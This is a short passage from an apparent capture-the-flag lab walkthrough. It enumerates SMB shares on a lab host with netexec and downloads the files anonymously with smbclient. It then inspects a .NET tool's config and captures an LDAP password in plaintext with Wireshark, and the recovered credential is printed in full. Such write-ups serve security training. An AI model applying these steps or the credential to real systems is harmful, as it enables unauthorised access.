Last updated 9 months ago
Was this helpful?
$ netexec smb 10.10.11.174 -u 'adot8' -p '' --shares
smbclient "\\\\10.10.11.174\\support-tools" -U 'adot8' -N smb: \> prompt off smb: \> recurse on smb: \> mget *
unzip UserInfo.exe.zip
$ cat UserInfo.exe.config
Dotnet framework installed means I can run executables
Open wireshark and listen on tun0. The LDAP query will be sent in plain text
support\ldap.$nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
